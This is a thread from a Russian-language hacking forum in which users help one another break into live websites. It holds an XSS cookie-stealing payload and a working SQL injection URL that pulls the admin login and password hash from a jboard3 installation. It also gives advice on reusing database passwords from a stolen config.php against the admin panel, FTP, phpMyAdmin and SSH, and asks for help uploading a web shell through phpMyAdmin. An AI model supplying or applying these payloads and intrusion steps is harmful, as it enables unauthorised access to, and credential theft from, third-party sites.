HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16551  
Старый 10.03.2011, 12:51
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от stasiliy  
stasiliy said:
пробовал, не выходит
А в /etc/passwd можно откопать имя пользователя???
данный файл носит больше информационную нагрузку..имена пользователей системы ты там найдешь...но это тебе не поможет...попробуй подключится к базе айпи_адресс_сервера:3306 (но скорее всего не получится, как тебе уже говорили), посмотри на 2ип.ру какие еще сайты есть на серванте, попробуй у соседей почитать конфиги..может где и есть бейсик авторизация в админку..
 
Ответить с цитированием

  #16552  
Старый 10.03.2011, 13:21
M1lten
Guest
Сообщений: n/a
Провел на форуме:
12753

Репутация: 0
По умолчанию

Проблема с фильтрацией двойных ковычек в ксс...

В общем проблема:

Цитата:
Сообщение от None  
...
value="alert(document.cookie)">
И так:

Цитата:
Сообщение от None  
...
value="
>
alert(document.cookie)">
Так-то оно вроде все нормально, но мне нужно выйти за приделы value, если подставить двойную кавычку, она фильтруется через htmlspecialchars()...

Пробовал и так:

Цитата:
Сообщение от None  
data:text/html;base64,Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2 tpZSk8L3NjcmlwdD4=
Но пока безуспешно... Подскажите что-нибудь.
 
Ответить с цитированием

  #16553  
Старый 10.03.2011, 13:30
bluesky
Новичок
Регистрация: 26.09.2009
Сообщений: 9
Провел на форуме:
92035

Репутация: 0
По умолчанию

Есть скул на jboard3

Код:
Code:
export.php?t=php&n=5&c=0&r=40%20UNION%20SELECT%201,2,3,4,concat%28table_schema,0x2e,TABLE_NAME%29%20FROM%20INFORMATION_SCHEMA.TABLES%23
Помогите выудить логин и пасс админа, структура таблиц вот:

Код:
Code:
`jb_admin`
--

CREATE TABLE `jb_admin` (
  `login` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
 
Ответить с цитированием

  #16554  
Старый 10.03.2011, 18:19
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от stasiliy  
stasiliy said:
Помогите, плз
Имею
пхп-инъек
..
Вытащил
config.php
- получил данные к mysql, но
host:localhost
Вопрос: как можно узнать
mysql.server
???
спасибо​
Как тебе уже сказали, подключиться удаленно к БД получится вряд ли. Ну тут есть пару вариантов:

1) попробовать вытащенный пасс из конфига к админке с юзером: admin, adm, administrator и с юзером, который был вытащен из конфига.

2) попробовать подключиться к FTP. пасс: из конфига. юзер: "админовские", из конфига который, из /etc/passwd

3) попробовать найти на домене phpMyAdmin и с данным пассом подключиться к ней. Юзеров опять же пробовать "админовских", из конфига который, из /etc/passwd

4) попробовать подключиться к SSH. Пароль из конфига. Юзеры: "админовские", root, из конфига, из /etc/passwd.

P.S.: Если в /etc/passwd дохера юзеров (т.е. имя системного пользователя для каждого аккаунта на хостинге), то нет смысла пробовать пробить все! Тебе из /etc/passwd нужно имя пользователя-владельца, где ты нашел инклюд.

bluesky На античате куча статей по SQL-иньекциям, советую почитать

Запрос тебе нужен такой:

export.php?t=php&n=5&c=0&r=40+UNION+SELECT+1,2,3,4 ,concat(login,0x3a,password)+FROM+jb_admin--+

Moriarty, ты не поставил комменатрий, без которого запрос может не обрезать и SQL-запрос вызовет ошибку. Ну и '::' нет смысла) А вдруг mq? Который обычно включен всегда. Правильнее захексить: 0x3a3a.
 
Ответить с цитированием

  #16555  
Старый 10.03.2011, 21:10
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Требуется помощь в заливке шелла через phpMyAdmin

5.1.41-3ubuntu12.10:root@localhost:debian-linux-gnu

file_priv=Y

MQ=on
 
Ответить с цитированием

  #16556  
Старый 10.03.2011, 21:14
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

ты не нуждаешся в помощи, только нужно найти путь к папке где есть права на заливку, что еще надо?
 
Ответить с цитированием

  #16557  
Старый 10.03.2011, 21:22
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
ты не нуждаешся в помощи, только нужно найти путь к папке где есть права на заливку, что еще надо?
Перебрал более 30 папок, но такой не нашел.

Сейчас пытаюсь залить через URL двойным запросом, но пока не очень получается.
 
Ответить с цитированием

  #16558  
Старый 10.03.2011, 21:33
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Не получается.

Кто возмется залить, скину линк в ПМ.
 
Ответить с цитированием

  #16559  
Старый 10.03.2011, 21:44
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от FlaktW  
FlaktW said:
Перебрал более 30 папок, но такой не нашел.
Сейчас пытаюсь залить через URL двойным запросом, но пока не очень получается.
а если не нашел тогда чем поможет тебе двойной запрос?

все равно прав не будет, тама скани директории сайта,реверсни IP, мб найдеш инклуд в соседних сайтах
 
Ответить с цитированием

  #16560  
Старый 10.03.2011, 22:00
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
а если не нашел тогда чем поможет тебе двойной запрос?
все равно прав не будет, тама скани директории сайта,реверсни IP, мб найдеш инклуд в соседних сайтах
там два сайта. один на php, второй на asp.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ